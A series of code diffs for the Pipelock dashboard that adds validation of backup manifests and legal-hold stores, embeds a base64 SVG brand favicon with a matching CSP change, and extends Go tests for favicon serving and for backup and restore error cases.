+func rollbackState(stores []durableStateStore, originals map[string][]byte, missing map[string]bool) error {
 	var errs []error
-	for _, name := range names {
-		path := filepath.Join(stateDir, name)
-		if missing[name] {
-			if err := os.Remove(path); err != nil && !errors.Is(err, os.ErrNotExist) {
-				errs = append(errs, fmt.Errorf("remove %s: %w", name, err))
+	for _, store := range sortedDurableStateStores(stores) {
+		if missing[store.archiveName] {
+			if err := os.Remove(store.path); err != nil && !errors.Is(err, os.ErrNotExist) {
+				errs = append(errs, fmt.Errorf("remove %s: %w", store.archiveName, err))
 			}
 			continue
 		}
-		if err := writeDashboardStateFile(path, originals[name], 0o600); err != nil {
-			errs = append(errs, fmt.Errorf("restore %s: %w", name, err))
+		if err := writeDashboardStateFile(store.path, originals[store.archiveName], 0o600); err != nil {
+			errs = append(errs, fmt.Errorf("restore %s: %w", store.archiveName, err))
 		}
 	}
 	return errors.Join(errs...)
@@ -374,6 +576,9 @@ func decodeBackup(data []byte) (map[string][]byte, error) {
 	}
 	seen := make(map[string]struct{}, len(manifest.Files))
 	for _, file := range manifest.Files {
+		if err := validateManifestFileIdentity(file); err != nil {
+			return nil, err
+		}
 		entry, exists := entries[file.Name]
 		if _, duplicate := seen[file.Name]; duplicate || !exists || int64(len(entry)) != file.Size {
 			return nil, fmt.Errorf("validate dashboard backup archive: manifest mismatch for %q", file.Name)
@@ -388,6 +593,30 @@ func decodeBackup(data []byte) (map[string][]byte, error) {
 		}
 	}
 	return entries, nil
+}
+
+func validateManifestFileIdentity(file backupManifestFile) error {
+	store := file.Store
+	if store == "" {
+		store = storeForArchiveName(file.Name)
+	}
+	if store == "" || storeForArchiveName(file.Name) != store {
+		return fmt.Errorf("validate dashboard backup archive: manifest mismatch for %q", file.Name)
+	}
+	return nil
+}
+
+func storeForArchiveName(name string) string {
+	switch name {
+	case ExemptionStateFile:
+		return backupStoreExemptions
+	case DeliveryInboxStateFile:
+		return backupStoreDelivery
+	case LegalHoldStateFile:
+		return backupStoreLegalHolds
+	default:
+		return ""
+	}
 }
 
 func validateStateFile(name string, data []byte) error {
@@ -412,6 +641,38 @@ func validateStateFile(name string, data []byte) error {
 			}
 			seen[record.ID] = struct{}{}
 		}
+	}
+	if name == LegalHoldStateFile {
+		if err := validateLegalHoldState(data); err != nil {
+			return errors.New("invalid legal hold store schema")
+		}
+	}
+	return nil
+}
+
+func validateLegalHoldState(data []byte) error {
+	if len(data) == 0 {
+		return errors.New("legal hold store: empty file is invalid")
+	}
+	var records []LegalHold
+	if err := decodeStrictJSON(data, &records); err != nil {
+		return err
+	}
+	if records == nil {
+		return errors.New("legal hold store: root must be a JSON array")
+	}
+	if len(records) > legalHoldMaxRecords {
+		return fmt.Errorf("legal hold store: record count exceeds %d", legalHoldMaxRecords)
+	}
+	seen := make(map[string]struct{}, len(records))
+	for _, hold := range records {
+		if err := validateLegalHold(hold, true); err != nil {
+			return err
+		}
+		if _, duplicate := seen[hold.ID]; duplicate {
+			return fmt.Errorf("legal hold store: duplicate id %q", hold.ID)
+		}
+		seen[hold.ID] = struct{}{}
 	}
 	return nil
 }

--- a/enterprise/dashboard/budgets.tmpl.html
+++ b/enterprise/dashboard/budgets.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Agent Budgets</title>
   <style>
     :root {

--- a/enterprise/dashboard/evidence.tmpl.html
+++ b/enterprise/dashboard/evidence.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Evidence</title>
   <style>
     :root {

--- a/enterprise/dashboard/exemptions.tmpl.html
+++ b/enterprise/dashboard/exemptions.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Exemptions</title>
   <style>
     :root {

--- a/enterprise/dashboard/fleetoverview.tmpl.html
+++ b/enterprise/dashboard/fleetoverview.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Fleet Overview</title>
   <style>
     :root {

--- a/enterprise/dashboard/handler.go
+++ b/enterprise/dashboard/handler.go
@@ -58,11 +58,7 @@ var (
 )
 
 func parseDashboardTemplate(name string) *template.Template {
-	return template.Must(template.New(name).Funcs(template.FuncMap{
-		"dashboardFaviconDataURL": func() template.URL {
-			return template.URL(dashboardFaviconDataURL)
-		},
-	}).ParseFS(templateFS, name, "nav.tmpl.html"))
+	return template.Must(template.New(name).ParseFS(templateFS, name, "nav.tmpl.html"))
 }
 
 func mustDecodeDashboardFavicon() []byte {

--- a/enterprise/dashboard/handler.go
+++ b/enterprise/dashboard/handler.go
@@ -27,14 +27,19 @@ import (
 )
 
 const (
-	contentSecurityPolicy = "default-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'none'; base-uri 'none'; object-src 'none'"
+	contentSecurityPolicy = "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'none'; base-uri 'none'; object-src 'none'"
 	contentTypeHTML       = "text/html; charset=utf-8"
 	contentTypeSVG        = "image/svg+xml; charset=utf-8"
 	contentTypeText       = "text/plain; charset=utf-8"
 	auditSessionMaxBytes  = 128
 )
 
-const dashboardFaviconSVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 64 64"><rect width="64" height="64" rx="12" fill="#09090b"/><path d="M20 30v-8c0-7 5-12 12-12s12 5 12 12v8" fill="none" stroke="#00e5a0" stroke-width="6" stroke-linecap="round"/><rect x="16" y="28" width="32" height="24" rx="5" fill="#00e5a0"/><circle cx="32" cy="40" r="4" fill="#09090b"/></svg>`
+const (
+	dashboardFaviconSVGBase64 = `PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA0MDAgNDgwIiBmaWxsPSJub25lIj4KICA8ZGVmcz4KICAgIDxsaW5lYXJHcmFkaWVudCBpZD0ic2hhY2tsZS1ncmFkIiB4MT0iMjAwIiB5MT0iNDAiIHgyPSIyMDAiIHkyPSIxODAiIGdyYWRpZW50VW5pdHM9InVzZXJTcGFjZU9uVXNlIj4KICAgICAgPHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iIzAwZmZjOCIvPgogICAgICA8c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiMwMGI4OTQiLz4KICAgIDwvbGluZWFyR3JhZGllbnQ+CiAgICA8bGluZWFyR3JhZGllbnQgaWQ9ImJvZHktZ3JhZCIgeDE9IjIwMCIgeTE9IjE2MCIgeDI9IjIwMCIgeTI9IjM0MCIgZ3JhZGllbnRVbml0cz0idXNlclNwYWNlT25Vc2UiPgogICAgICA8c3RvcCBvZmZzZXQ9IjAlIiBzdG9wLWNvbG9yPSIjMWExYTJlIi8+CiAgICAgIDxzdG9wIG9mZnNldD0iMTAwJSIgc3RvcC1jb2xvcj0iIzBmMGYxYSIvPgogICAgPC9saW5lYXJHcmFkaWVudD4KICAgIDxmaWx0ZXIgaWQ9Imdsb3ciPgogICAgICA8ZmVHYXVzc2lhbkJsdXIgc3RkRGV2aWF0aW9uPSI2IiByZXN1bHQ9ImJsdXIiLz4KICAgICAgPGZlTWVyZ2U+CiAgICAgICAgPGZlTWVyZ2VOb2RlIGluPSJibHVyIi8+CiAgICAgICAgPGZlTWVyZ2VOb2RlIGluPSJTb3VyY2VHcmFwaGljIi8+CiAgICAgIDwvZmVNZXJnZT4KICAgIDwvZmlsdGVyPgogICAgPGZpbHRlciBpZD0iZ2xvdy10ZXh0Ij4KICAgICAgPGZlR2F1c3NpYW5CbHVyIHN0ZERldmlhdGlvbj0iMyIgcmVzdWx0PSJibHVyIi8+CiAgICAgIDxmZU1lcmdlPgogICAgICAgIDxmZU1lcmdlTm9kZSBpbj0iYmx1ciIvPgogICAgICAgIDxmZU1lcmdlTm9kZSBpbj0iU291cmNlR3JhcGhpYyIvPgogICAgICA8L2ZlTWVyZ2U+CiAgICA8L2ZpbHRlcj4KICA8L2RlZnM+CgogIDwhLS0gU2hhY2tsZSAocGlwZS1zdHlsZSkgLS0+CiAgPHBhdGggZD0iTTEzMCAxODAgTDEzMCAxMTAgQzEzMCA2NSAxNjAgNDAgMjAwIDQwIEMyNDAgNDAgMjcwIDY1IDI3MCAxMTAgTDI3MCAxODAiCiAgICAgICAgc3Ryb2tlPSJ1cmwoI3NoYWNrbGUtZ3JhZCkiIHN0cm9rZS13aWR0aD0iMjgiIHN0cm9rZS1saW5lY2FwPSJyb3VuZCIgZmlsbD0ibm9uZSIgZmlsdGVyPSJ1cmwoI2dsb3cpIi8+CgogIDwhLS0gUGlwZSBqb2ludHMgb24gc2hhY2tsZSBlbmRzIC0tPgogIDxyZWN0IHg9IjExNCIgeT0iMTY1IiB3aWR0aD0iMzIiIGhlaWdodD0iMTYiIHJ4PSIzIiBmaWxsPSIjMDBmZmM4IiBvcGFjaXR5PSIwLjciLz4KICA8cmVjdCB4PSIyNTQiIHk9IjE2NSIgd2lkdGg9IjMyIiBoZWlnaHQ9IjE2IiByeD0iMyIgZmlsbD0iIzAwZmZjOCIgb3BhY2l0eT0iMC43Ii8+CgogIDwhLS0gTG9jayBib2R5IC0tPgogIDxyZWN0IHg9IjkwIiB5PSIxODAiIHdpZHRoPSIyMjAiIGhlaWdodD0iMTYwIiByeD0iMTYiIGZpbGw9InVybCgjYm9keS1ncmFkKSIKICAgICAgICBzdHJva2U9IiMwMGZmYzgiIHN0cm9rZS13aWR0aD0iMi41IiBmaWx0ZXI9InVybCgjZ2xvdykiLz4KCiAgPCEtLSBCb2R5IGlubmVyIGJvcmRlciBhY2NlbnQgLS0+CiAgPHJlY3QgeD0iMTAwIiB5PSIxOTAiIHdpZHRoPSIyMDAiIGhlaWdodD0iMTQwIiByeD0iMTAiIGZpbGw9Im5vbmUiCiAgICAgICAgc3Ryb2tlPSIjMDBmZmM4IiBzdHJva2Utd2lkdGg9IjAuNSIgb3BhY2l0eT0iMC4yIi8+CgogIDwhLS0gS2V5aG9sZSAtLT4KICA8Y2lyY2xlIGN4PSIyMDAiIGN5PSIyNDgiIHI9IjE4IiBmaWxsPSIjMDBmZmM4IiBvcGFjaXR5PSIwLjkiIGZpbHRlcj0idXJsKCNnbG93KSIvPgogIDxjaXJjbGUgY3g9IjIwMCIgY3k9IjI0OCIgcj0iMTAiIGZpbGw9IiMwZjBmMWEiLz4KICA8cmVjdCB4PSIxOTYiIHk9IjI1NiIgd2lkdGg9IjgiIGhlaWdodD0iMjQiIHJ4PSIzIiBmaWxsPSIjMDBmZmM4IiBvcGFjaXR5PSIwLjkiLz4KICA8cmVjdCB4PSIxOTYiIHk9IjI1NiIgd2lkdGg9IjgiIGhlaWdodD0iMjQiIHJ4PSIzIiBmaWxsPSIjMGYwZjFhIiBvcGFjaXR5PSIwLjQiLz4KCiAgPCEtLSBQaXBlIHRocmVhZCBsaW5lcyBvbiBib2R5IHNpZGVzIC0tPgogIDxsaW5lIHgxPSI5NSIgeTE9IjIxMCIgeDI9Ijk1IiB5Mj0iMjE1IiBzdHJva2U9IiMwMGZmYzgiIHN0cm9rZS13aWR0aD0iMSIgb3BhY2l0eT0iMC4zIi8+CiAgPGxpbmUgeDE9Ijk1IiB5MT0iMjIyIiB4Mj0iOTUiIHkyPSIyMjciIHN0cm9rZT0iIzAwZmZjOCIgc3Ryb2tlLXdpZHRoPSIxIiBvcGFjaXR5PSIwLjMiLz4KICA8bGluZSB4MT0iOTUiIHkxPSIyMzQiIHgyPSI5NSIgeTI9IjIzOSIgc3Ryb2tlPSIjMDBmZmM4IiBzdHJva2Utd2lkdGg9IjEiIG9wYWNpdHk9IjAuMyIvPgogIDxsaW5lIHgxPSIzMDUiIHkxPSIyMTAiIHgyPSIzMDUiIHkyPSIyMTUiIHN0cm9rZT0iIzAwZmZjOCIgc3Ryb2tlLXdpZHRoPSIxIiBvcGFjaXR5PSIwLjMiLz4KICA8bGluZSB4MT0iMzA1IiB5MT0iMjIyIiB4Mj0iMzA1IiB5Mj0iMjI3IiBzdHJva2U9IiMwMGZmYzgiIHN0cm9rZS13aWR0aD0iMSIgb3BhY2l0eT0iMC4zIi8+CiAgPGxpbmUgeDE9IjMwNSIgeTE9IjIzNCIgeDI9IjMwNSIgeTI9IjIzOSIgc3Ryb2tlPSIjMDBmZmM4IiBzdHJva2Utd2lkdGg9IjEiIG9wYWNpdHk9IjAuMyIvPgoKICA8IS0tICJQSVBFTE9DSyIgdGV4dCAtLT4KICA8dGV4dCB4PSIyMDAiIHk9IjQyMCIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZm9udC1mYW1pbHk9IidKZXRCcmFpbnMgTW9ubycsICdGaXJhIENvZGUnLCAnQ291cmllciBOZXcnLCBtb25vc3BhY2UiCiAgICAgICAgZm9udC1zaXplPSI1MiIgZm9udC13ZWlnaHQ9IjcwMCIgbGV0dGVyLXNwYWNpbmc9IjYiIGZpbGw9IiMwMGZmYzgiIGZpbHRlcj0idXJsKCNnbG93LXRleHQpIj5QSVBFTE9DSzwvdGV4dD4KCiAgPCEtLSBTdWJ0bGUgdGFnbGluZSAtLT4KICA8dGV4dCB4PSIyMDAiIHk9IjQ1NSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZm9udC1mYW1pbHk9IidJbnRlcicsICdIZWx2ZXRpY2EgTmV1ZScsIHNhbnMtc2VyaWYiCiAgICAgICAgZm9udC1zaXplPSIxNCIgZm9udC13ZWlnaHQ9IjQwMCIgbGV0dGVyLXNwYWNpbmc9IjQiIGZpbGw9IiM5NGEzYjgiIHRleHQtdHJhbnNmb3JtPSJ1cHBlcmNhc2UiPkFHRU5UIEZJUkVXQUxMPC90ZXh0Pgo8L3N2Zz4K`
+	dashboardFaviconDataURL   = "data:image/svg+xml;base64," + dashboardFaviconSVGBase64
+)
+
+var dashboardFaviconSVG = mustDecodeDashboardFavicon()
 
 //go:embed nav.tmpl.html overview.tmpl.html evidence.tmpl.html exemptions.tmpl.html agents.tmpl.html investigator.tmpl.html fleetoverview.tmpl.html workbench.tmpl.html incident.tmpl.html budgets.tmpl.html trustkeys.tmpl.html
 var templateFS embed.FS
@@ -53,7 +58,19 @@ var (
 )
 
 func parseDashboardTemplate(name string) *template.Template {
-	return template.Must(template.ParseFS(templateFS, name, "nav.tmpl.html"))
+	return template.Must(template.New(name).Funcs(template.FuncMap{
+		"dashboardFaviconDataURL": func() template.URL {
+			return template.URL(dashboardFaviconDataURL)
+		},
+	}).ParseFS(templateFS, name, "nav.tmpl.html"))
+}
+
+func mustDecodeDashboardFavicon() []byte {
+	data, err := base64.StdEncoding.DecodeString(dashboardFaviconSVGBase64)
+	if err != nil {
+		panic(fmt.Sprintf("decode dashboard favicon: %v", err))
+	}
+	return data
 }
 
 type pageData struct {
@@ -341,7 +358,7 @@ func handleFavicon(w http.ResponseWriter, r *http.Request) {
 	if r.Method == http.MethodHead {
 		return
 	}
-	_, _ = w.Write([]byte(dashboardFaviconSVG))
+	_, _ = w.Write(dashboardFaviconSVG)
 }
 
 type dashboardHandler struct {

--- a/enterprise/dashboard/handler_test.go
+++ b/enterprise/dashboard/handler_test.go
@@ -144,19 +144,41 @@ func TestHandler_FaviconServedWithoutDashboardRoute404(t *testing.T) {
 	t.Parallel()
 
 	handler := New(Options{})
-	rec := httptest.NewRecorder()
-	handler.ServeHTTP(rec, httptest.NewRequestWithContext(context.Background(), http.MethodGet, "/favicon.ico", nil))
-	if rec.Code != http.StatusOK {
-		t.Fatalf("favicon status = %d, want 200; body=%s", rec.Code, rec.Body.String())
-	}
-	if got := rec.Header().Get("Content-Type"); got != contentTypeSVG {
-		t.Fatalf("favicon content type = %q, want %q", got, contentTypeSVG)
-	}
-	for _, want := range []string{`<svg xmlns="http://www.w3.org/2000/svg"`, `viewBox="0 0 400 480"`, `PIPELOCK`} {
-		if !strings.Contains(rec.Body.String(), want) {
-			t.Fatalf("favicon body missing %q: %s", want, rec.Body.String())
+	t.Run("get", func(t *testing.T) {
+		rec := httptest.NewRecorder()
+		handler.ServeHTTP(rec, httptest.NewRequestWithContext(context.Background(), http.MethodGet, "/favicon.ico", nil))
+		if rec.Code != http.StatusOK {
+			t.Fatalf("favicon status = %d, want 200; body=%s", rec.Code, rec.Body.String())
 		}
-	}
+		if got := rec.Header().Get("Content-Type"); got != contentTypeSVG {
+			t.Fatalf("favicon content type = %q, want %q", got, contentTypeSVG)
+		}
+		for _, want := range []string{`<svg xmlns="http://www.w3.org/2000/svg"`, `viewBox="0 0 400 480"`, `PIPELOCK`} {
+			if !strings.Contains(rec.Body.String(), want) {
+				t.Fatalf("favicon body missing %q: %s", want, rec.Body.String())
+			}
+		}
+	})
+	t.Run("head", func(t *testing.T) {
+		rec := httptest.NewRecorder()
+		handler.ServeHTTP(rec, httptest.NewRequestWithContext(context.Background(), http.MethodHead, "/favicon.ico", nil))
+		if rec.Code != http.StatusOK {
+			t.Fatalf("favicon HEAD status = %d, want 200; body=%s", rec.Code, rec.Body.String())
+		}
+		if rec.Body.Len() != 0 {
+			t.Fatalf("favicon HEAD body length = %d, want 0", rec.Body.Len())
+		}
+	})
+	t.Run("post", func(t *testing.T) {
+		rec := httptest.NewRecorder()
+		handler.ServeHTTP(rec, httptest.NewRequestWithContext(context.Background(), http.MethodPost, "/favicon.ico", nil))
+		if rec.Code != http.StatusMethodNotAllowed {
+			t.Fatalf("favicon POST status = %d, want 405; body=%s", rec.Code, rec.Body.String())
+		}
+		if got := rec.Header().Get("Allow"); got != http.MethodGet {
+			t.Fatalf("favicon POST Allow = %q, want %q", got, http.MethodGet)
+		}
+	})
 }
 
 func TestHandler_FaviconUsesEmbeddedBrandAsset(t *testing.T) {
@@ -189,13 +211,15 @@ func TestDashboardTemplatesIncludeEmbeddedBrandFavicon(t *testing.T) {
 		if entry.IsDir() || !strings.HasSuffix(name, ".tmpl.html") || name == "nav.tmpl.html" {
 			continue
 		}
-		data, err := templateFS.ReadFile(name)
-		if err != nil {
-			t.Fatal(err)
-		}
-		if !strings.Contains(string(data), `{{template "dashboardFavicon" .}}`) {
-			t.Fatalf("%s does not include dashboardFavicon", name)
-		}
+		t.Run(name, func(t *testing.T) {
+			data, err := templateFS.ReadFile(name)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if !strings.Contains(string(data), `{{template "dashboardFavicon" .}}`) {
+				t.Fatalf("%s does not include dashboardFavicon", name)
+			}
+		})
 	}
 }
 

--- a/enterprise/dashboard/handler_test.go
+++ b/enterprise/dashboard/handler_test.go
@@ -14,6 +14,8 @@ import (
 	"net/http"
 	"net/http/httptest"
 	"net/url"
+	"os"
+	"path/filepath"
 	"strings"
 	"sync"
 	"testing"
@@ -150,9 +152,49 @@ func TestHandler_FaviconServedWithoutDashboardRoute404(t *testing.T) {
 	if got := rec.Header().Get("Content-Type"); got != contentTypeSVG {
 		t.Fatalf("favicon content type = %q, want %q", got, contentTypeSVG)
 	}
-	for _, want := range []string{`<svg xmlns="http://www.w3.org/2000/svg"`, `#00e5a0`} {
+	for _, want := range []string{`<svg xmlns="http://www.w3.org/2000/svg"`, `viewBox="0 0 400 480"`, `PIPELOCK`} {
 		if !strings.Contains(rec.Body.String(), want) {
 			t.Fatalf("favicon body missing %q: %s", want, rec.Body.String())
+		}
+	}
+}
+
+func TestHandler_FaviconUsesEmbeddedBrandAsset(t *testing.T) {
+	t.Parallel()
+
+	asset, err := os.ReadFile(filepath.Join("..", "..", "assets", "pipelock-logo.svg"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(dashboardFaviconSVG) != string(asset) {
+		t.Fatal("embedded dashboard favicon does not match assets/pipelock-logo.svg")
+	}
+	if !strings.HasPrefix(dashboardFaviconDataURL, "data:image/svg+xml;base64,") {
+		t.Fatalf("favicon data URL = %q", dashboardFaviconDataURL)
+	}
+	if !strings.Contains(contentSecurityPolicy, "img-src 'self' data:") {
+		t.Fatalf("CSP does not allow embedded SVG favicon: %q", contentSecurityPolicy)
+	}
+}
+
+func TestDashboardTemplatesIncludeEmbeddedBrandFavicon(t *testing.T) {
+	t.Parallel()
+
+	entries, err := templateFS.ReadDir(".")
+	if err != nil {
+		t.Fatal(err)
+	}
+	for _, entry := range entries {
+		name := entry.Name()
+		if entry.IsDir() || !strings.HasSuffix(name, ".tmpl.html") || name == "nav.tmpl.html" {
+			continue
+		}
+		data, err := templateFS.ReadFile(name)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if !strings.Contains(string(data), `{{template "dashboardFavicon" .}}`) {
+			t.Fatalf("%s does not include dashboardFavicon", name)
 		}
 	}
 }

--- a/enterprise/dashboard/incident.tmpl.html
+++ b/enterprise/dashboard/incident.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Incident Cockpit</title>
   <style>
     :root {

--- a/enterprise/dashboard/investigator.tmpl.html
+++ b/enterprise/dashboard/investigator.tmpl.html
@@ -3,6 +3,7 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
+  {{template "dashboardFavicon" .}}
   <title>Pipelock Evidence - Receipt Detail</title>
   <style>
     :root {

--- a/enterprise/dashboard/nav.tmpl.html
+++ b/enterprise/dashboard/nav.tmpl.html
@@ -17,6 +17,10 @@
 .summary b { color: var(--text); font-weight: 700; }
 {{end}}
 
+{{define "dashboardFavicon"}}
+<link rel="icon" href="{{dashboardFaviconDataURL}}" type="image/svg+xml">
+{{end}}
+
 {{define "dashboardHeader"}}
 <style>
 /* Shared operator-console top bar. Higher specificity than the per-view base

--- a/enterprise/dashboard/nav.tmpl.html
+++ b/enterprise/dashboard/nav.tmpl.html
@@ -18,7 +18,7 @@
 {{end}}
 
 {{define "dashboardFavicon"}}
-<link rel="icon" href="{{dashboardFaviconDataURL}}" type="image/svg+xml">
+<link rel="icon" href="/favicon.ico" type="image/svg+xml">
 {{end}}
 
 {{define "dashboardHeader"}}

--- a/enterprise/dashboard/operability_test.go
+++ b/enterprise/dashboard/operability_test.go
@@ -284,6 +284,9 @@ func TestBackupStateWithOptions_RejectsConfiguredStoreErrors(t *testing.T) {
 	})
 
 	t.Run("unreadable legal hold store", func(t *testing.T) {
+		if os.Geteuid() == 0 {
+			t.Skip("permission-bit failure case is not reliable as root")
+		}
 		stateDir := t.TempDir()
 		legalHoldPath := filepath.Join(stateDir, LegalHoldStateFile)
 		if err := os.WriteFile(legalHoldPath, legalHoldStateJSON("hold-unreadable"), 0o600); err != nil {
@@ -320,6 +323,9 @@ func TestBackupStateWithOptions_RejectsConfiguredStoreErrors(t *testing.T) {
 	})
 
 	t.Run("archive directory cannot be created", func(t *testing.T) {
+		if os.Geteuid() == 0 {
+			t.Skip("permission-bit failure case is not reliable as root")
+		}
 		stateDir := t.TempDir()
 		parentDir := t.TempDir()
 		if err := os.Chmod(parentDir, ownerReadSearchOnlyMode()); err != nil {
@@ -393,6 +399,9 @@ func TestRestoreStateWithOptions_RejectsCorruptArchiveAndBadTargets(t *testing.T
 	})
 
 	t.Run("configured legal hold parent is not writable", func(t *testing.T) {
+		if os.Geteuid() == 0 {
+			t.Skip("permission-bit failure case is not reliable as root")
+		}
 		archive := filepath.Join(t.TempDir(), "legal-holds.tar")
 		writeBackupArchive(t, archive, map[string][]byte{
 			LegalHoldStateFile: legalHoldStateJSON("hold-parent-file"),

--- a/enterprise/dashboard/operability_test.go
+++ b/enterprise/dashboard/operability_test.go
@@ -12,6 +12,7 @@ import (
 	"encoding/hex"
 	"encoding/json"
 	"errors"
+	"fmt"
 	"net/http"
 	"net/http/httptest"
 	"os"
@@ -241,6 +242,176 @@ func TestBackupRestore_HonorsConfiguredStorePaths(t *testing.T) {
 	}
 }
 
+func TestBackupStateWithOptions_ReportsMissingConfiguredLegalHoldStore(t *testing.T) {
+	stateDir := t.TempDir()
+	archive := filepath.Join(t.TempDir(), "dashboard-backup.tar")
+	missingLegalHoldPath := filepath.Join(t.TempDir(), LegalHoldStateFile)
+	result, err := BackupStateWithOptions(BackupOptions{
+		StateDir:           stateDir,
+		ArchivePath:        archive,
+		LegalHoldStorePath: missingLegalHoldPath,
+	})
+	if err != nil {
+		t.Fatalf("BackupStateWithOptions: %v", err)
+	}
+	if stringSliceContains(result.CapturedStores, backupStoreLegalHolds) {
+		t.Fatalf("captured missing legal-hold store: %#v", result)
+	}
+	if !stringSliceContains(result.MissingStores, backupStoreLegalHolds) {
+		t.Fatalf("missing stores = %v, want %s", result.MissingStores, backupStoreLegalHolds)
+	}
+	if _, err := os.Stat(archive); err != nil {
+		t.Fatalf("backup archive was not written for missing optional stores: %v", err)
+	}
+}
+
+func TestBackupStateWithOptions_RejectsConfiguredStoreErrors(t *testing.T) {
+	t.Run("duplicate store path", func(t *testing.T) {
+		stateDir := t.TempDir()
+		storePath := filepath.Join(stateDir, ExemptionStateFile)
+		if err := os.WriteFile(storePath, []byte(`[]`), 0o600); err != nil {
+			t.Fatal(err)
+		}
+		_, err := BackupStateWithOptions(BackupOptions{
+			StateDir:           stateDir,
+			ArchivePath:        filepath.Join(t.TempDir(), "backup.tar"),
+			ExemptionStorePath: storePath,
+			LegalHoldStorePath: storePath,
+		})
+		if err == nil || !strings.Contains(err.Error(), "resolve to the same path") {
+			t.Fatalf("duplicate store path error = %v", err)
+		}
+	})
+
+	t.Run("unreadable legal hold store", func(t *testing.T) {
+		stateDir := t.TempDir()
+		legalHoldPath := filepath.Join(stateDir, LegalHoldStateFile)
+		if err := os.WriteFile(legalHoldPath, legalHoldStateJSON("hold-unreadable"), 0o600); err != nil {
+			t.Fatal(err)
+		}
+		if err := os.Chmod(legalHoldPath, 0); err != nil {
+			t.Fatal(err)
+		}
+		t.Cleanup(func() { _ = os.Chmod(legalHoldPath, 0o600) })
+		_, err := BackupStateWithOptions(BackupOptions{
+			StateDir:           stateDir,
+			ArchivePath:        filepath.Join(t.TempDir(), "backup.tar"),
+			LegalHoldStorePath: legalHoldPath,
+		})
+		if err == nil || !strings.Contains(err.Error(), LegalHoldStateFile) {
+			t.Fatalf("unreadable legal-hold backup error = %v", err)
+		}
+	})
+
+	t.Run("invalid legal hold schema", func(t *testing.T) {
+		stateDir := t.TempDir()
+		legalHoldPath := filepath.Join(stateDir, LegalHoldStateFile)
+		if err := os.WriteFile(legalHoldPath, []byte(`{"id":"not-an-array"}`), 0o600); err != nil {
+			t.Fatal(err)
+		}
+		_, err := BackupStateWithOptions(BackupOptions{
+			StateDir:           stateDir,
+			ArchivePath:        filepath.Join(t.TempDir(), "backup.tar"),
+			LegalHoldStorePath: legalHoldPath,
+		})
+		if err == nil || !strings.Contains(err.Error(), "invalid legal hold store schema") {
+			t.Fatalf("invalid legal-hold backup error = %v", err)
+		}
+	})
+
+	t.Run("archive directory cannot be created", func(t *testing.T) {
+		stateDir := t.TempDir()
+		parentDir := t.TempDir()
+		if err := os.Chmod(parentDir, ownerReadSearchOnlyMode()); err != nil {
+			t.Fatal(err)
+		}
+		_, err := BackupStateWithOptions(BackupOptions{
+			StateDir:    stateDir,
+			ArchivePath: filepath.Join(parentDir, "missing", "backup.tar"),
+		})
+		if err == nil || !strings.Contains(err.Error(), "create dashboard backup directory") {
+			t.Fatalf("archive directory error = %v", err)
+		}
+	})
+}
+
+func TestRestoreStateWithOptions_RejectsLegalHoldsWithoutConfiguredTarget(t *testing.T) {
+	archive := filepath.Join(t.TempDir(), "legal-holds.tar")
+	writeBackupArchive(t, archive, map[string][]byte{
+		LegalHoldStateFile: legalHoldStateJSON("hold-required"),
+	})
+
+	restoreDir := t.TempDir()
+	priorExemptions := []byte(`[{"id":"exm-keep","scope":"api.vendor.example","owner":"security","reason":"temporary","created":"2026-01-01T00:00:00Z","expiry":"2026-02-01T00:00:00Z"}]`)
+	exemptionPath := filepath.Join(restoreDir, ExemptionStateFile)
+	if err := os.WriteFile(exemptionPath, priorExemptions, 0o600); err != nil {
+		t.Fatal(err)
+	}
+
+	_, err := RestoreStateWithOptions(RestoreOptions{
+		StateDir:    restoreDir,
+		ArchivePath: archive,
+	})
+	if err == nil || !strings.Contains(err.Error(), "target store path is not configured") {
+		t.Fatalf("restore without legal-hold target error = %v", err)
+	}
+	after, err := os.ReadFile(filepath.Clean(exemptionPath))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !bytes.Equal(after, priorExemptions) {
+		t.Fatalf("rejected restore mutated exemptions: %s", after)
+	}
+	if _, err := os.Stat(filepath.Join(restoreDir, LegalHoldStateFile)); !errors.Is(err, os.ErrNotExist) {
+		t.Fatalf("legal holds were restored without configured target, stat err=%v", err)
+	}
+}
+
+func TestRestoreStateWithOptions_RejectsCorruptArchiveAndBadTargets(t *testing.T) {
+	t.Run("missing archive", func(t *testing.T) {
+		_, err := RestoreStateWithOptions(RestoreOptions{
+			StateDir:    t.TempDir(),
+			ArchivePath: filepath.Join(t.TempDir(), "missing.tar"),
+		})
+		if err == nil || !strings.Contains(err.Error(), "read dashboard backup") {
+			t.Fatalf("missing archive error = %v", err)
+		}
+	})
+
+	t.Run("corrupt tar", func(t *testing.T) {
+		archive := filepath.Join(t.TempDir(), "corrupt.tar")
+		if err := os.WriteFile(archive, []byte("not a tar archive"), 0o600); err != nil {
+			t.Fatal(err)
+		}
+		_, err := RestoreStateWithOptions(RestoreOptions{
